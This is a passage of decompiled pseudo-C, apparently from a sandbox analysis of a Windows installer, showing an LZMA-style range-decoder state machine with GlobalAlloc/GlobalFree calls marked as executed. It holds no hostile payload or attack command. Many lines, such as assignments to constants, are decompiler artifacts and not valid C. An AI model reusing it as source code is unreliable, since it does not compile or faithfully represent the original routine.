												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
